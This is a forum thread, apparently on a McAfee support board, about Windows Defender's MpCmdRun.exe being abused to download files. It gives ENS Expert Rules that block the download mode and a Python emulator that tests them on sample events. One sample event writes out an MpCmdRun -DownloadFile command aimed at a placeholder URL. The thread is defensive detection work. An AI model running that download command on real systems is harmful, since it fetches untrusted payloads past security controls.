Reliable Contributor
Message 1 of 4

Windows Defender = Malware Downloader

The latest version of Windows Defender can apparently be used for malware downloading as detailed at https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-downloa...

The following rules *should* block it.  The first will work on 10.6 or 10.7 by blocking the loading of DLLs into the abused process.  The second will block the execution, but only works in 10.7.  The second may also block logging by EDR tools as it prohibits the full execution rather than just the activity.    Test for yourself of course. 🙂

10.6/7:

# Blocks mpcmdrun.exe, when launched with "downloadfile" on its command line,
# from creating any section (i.e. from mapping/loading DLLs and other files).
Rule {
    Process {
        Include OBJECT_NAME { -v "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\mpcmdrun.exe" }
        Include PROCESS_CMD_LINE { -v "*downloadfile*" }
    }
    Target {
        Match SECTION {
            Include OBJECT_NAME { -v "**" }
            Include -access "CREATE"
        }
    }
}

10.7 Only:

# Blocks any process from creating (executing) mpcmdrun.exe with "downloadfile"
# on its command line; the process never starts, so EDR may log nothing for it.
Rule {
    Process {
        Include OBJECT_NAME { -v "**" }
    }
    Target {
        Match PROCESS {
            Include OBJECT_NAME { -v "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\mpcmdrun.exe" }
            Include PROCESS_CMD_LINE { -v "*downloadfile*" }
            Include -access "CREATE"
        }
    }
}

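As an added example (not part of the original post and not McAfee tooling), the Python below emulates what the two rules above match by running their Process/Target clauses over a few constructed process-creation and section-creation events. It assumes the Expert Rules wildcard semantics for paths as documented by McAfee (`*` stops at `\` or `/`, `**` crosses them, comparison is case-insensitive); whether a single `*` also stops at separators inside PROCESS_CMD_LINE is not settled by this post, so that is a flag, and the block shows that `**downloadfile**` matches a download command line under either reading. The Platform version folder, the URL, the save path and the event shape are constructed placeholders; the `-DownloadFile -url ... -path` switches come from the linked article, not from this post.

```python
import re

# Patterns copied from the two Expert Rules in the post above.
MPCMDRUN_PATH = r"C:\ProgramData\Microsoft\Windows Defender\Platform\*\mpcmdrun.exe"
DOWNLOAD_CMDLINE = "*downloadfile*"
ANY = "**"

# Assumption: whether a single '*' inside PROCESS_CMD_LINE may cross '\' and '/'.
# The post's "*downloadfile*" can only match a download command line (which
# carries a URL and a save path) if it does; flip this to see the effect.
CMDLINE_STAR_CROSSES_SEPARATORS = True


def glob_to_regex(pattern: str, star_crosses_separators: bool = False) -> re.Pattern:
    """Translate an Expert Rule wildcard pattern into an anchored regex.

    Assumed semantics (from the Expert Rules wildcard documentation): '*'
    matches any run of characters except '\\' and '/', '**' matches any run
    including them, and the comparison ignores case.
    """
    parts = []
    i = 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            parts.append(".*")
            i += 2
        elif pattern[i] == "*":
            parts.append(".*" if star_crosses_separators else r"[^\\/]*")
            i += 1
        else:
            parts.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE | re.DOTALL)


def matches(pattern: str, value: str, star_crosses_separators: bool = False) -> bool:
    return glob_to_regex(pattern, star_crosses_separators).match(value) is not None


def rule_section_create(event: dict) -> bool:
    """First rule (ENS 10.6/10.7): the acting process is mpcmdrun.exe under the
    Platform folder with downloadfile on its command line, and it creates a
    section (maps a DLL or other file) of any name."""
    return (
        event["type"] == "section_create"
        and matches(MPCMDRUN_PATH, event["actor_path"])
        and matches(DOWNLOAD_CMDLINE, event["actor_cmdline"], CMDLINE_STAR_CROSSES_SEPARATORS)
        and matches(ANY, event["target"])
    )


def rule_process_create(event: dict) -> bool:
    """Second rule (ENS 10.7 only): any process creates a child whose image is
    mpcmdrun.exe under the Platform folder with downloadfile on its command line."""
    return (
        event["type"] == "process_create"
        and matches(ANY, event["actor_path"])
        and matches(MPCMDRUN_PATH, event["target"])
        and matches(DOWNLOAD_CMDLINE, event["target_cmdline"], CMDLINE_STAR_CROSSES_SEPARATORS)
    )


# Constructed sample events, not real telemetry. Version folder, URL and save
# path are placeholders; the switches are the ones described in the linked article.
PLATFORM = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0\MpCmdRun.exe"
DOWNLOAD_ARGS = r'"MpCmdRun.exe" -DownloadFile -url http://example.invalid/p.bin -path C:\Users\Public\p.bin'

EVENTS = [
    # 1: cmd.exe starts MpCmdRun.exe in download mode -> process rule fires.
    {"type": "process_create", "actor_path": r"C:\Windows\System32\cmd.exe",
     "actor_cmdline": "cmd.exe", "target": PLATFORM, "target_cmdline": DOWNLOAD_ARGS},
    # 2: that MpCmdRun.exe then maps a DLL -> section rule fires.
    {"type": "section_create", "actor_path": PLATFORM, "actor_cmdline": DOWNLOAD_ARGS,
     "target": r"C:\Windows\System32\wininet.dll"},
    # 3: a routine scan by the same binary -> neither rule fires.
    {"type": "process_create", "actor_path": r"C:\Windows\System32\svchost.exe",
     "actor_cmdline": "svchost.exe", "target": PLATFORM,
     "target_cmdline": '"MpCmdRun.exe" -Scan -ScanType 1'},
    # 4: a copy of the binary outside the Platform folder -> not matched, because
    #    both rules key on the installed path.
    {"type": "process_create", "actor_path": r"C:\Windows\System32\cmd.exe",
     "actor_cmdline": "cmd.exe", "target": r"C:\Users\Public\MpCmdRun.exe",
     "target_cmdline": DOWNLOAD_ARGS},
    # 5: '*' covers exactly one folder level, so a deeper path is not matched either.
    {"type": "section_create",
     "actor_path": r"C:\ProgramData\Microsoft\Windows Defender\Platform\a\b\MpCmdRun.exe",
     "actor_cmdline": DOWNLOAD_ARGS, "target": r"C:\Windows\System32\ntdll.dll"},
]


def evaluate(events: list) -> list:
    """Return, per event, the names of the rules that would block it."""
    verdicts = []
    for ev in events:
        fired = []
        if rule_section_create(ev):
            fired.append("section rule (10.6/10.7)")
        if rule_process_create(ev):
            fired.append("process rule (10.7)")
        verdicts.append(fired)
    return verdicts


if __name__ == "__main__":
    for n, fired in enumerate(evaluate(EVENTS), 1):
        print(f"event {n}: {'BLOCK by ' + ', '.join(fired) if fired else 'allowed'}")
    # Separator-safe spelling of the command-line pattern under the strict reading:
    print("*downloadfile* strict:", matches(DOWNLOAD_CMDLINE, DOWNLOAD_ARGS))
    print("**downloadfile** strict:", matches("**downloadfile**", DOWNLOAD_ARGS))
```

Run it as a script to see the verdict per event. Event 4 shows that both rules key on the installed Platform path, and event 5 that `*` covers exactly one folder level; if either assumption differs on your build, loosen the OBJECT_NAME pattern (or use `**downloadfile**` for the command line) and, as the post says, test it.
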
3 Replies
McAfee Employee
Message 2 of 4

Re: Windows Defender = Malware Downloader

Hi @Daveb3d

Thanks for the information. Kindly let me know if there is any specific question for McAfee on this topic.

Reliable Contributor
Message 3 of 4

Re: Windows Defender = Malware Downloader

Thank you for asking. McAfee is now going about this in a slightly better way: the customer shares information and McAfee thanks him.

Question:

Which AMCore or McAfee Threat Intelligence Exchange (TIE) and Adaptive Threat Protection (ATP) Rule Content Update will reflect this, and when will McAfee customers get it? Tonight? This exploit is on all endpoints, if we understand it right.

Greetings from Switzerland

Reliable Contributor
Message 4 of 4

Re: Windows Defender = Malware Downloader

I have an SR in for this and a couple of other items to get JTI content. I would expect it before too long.
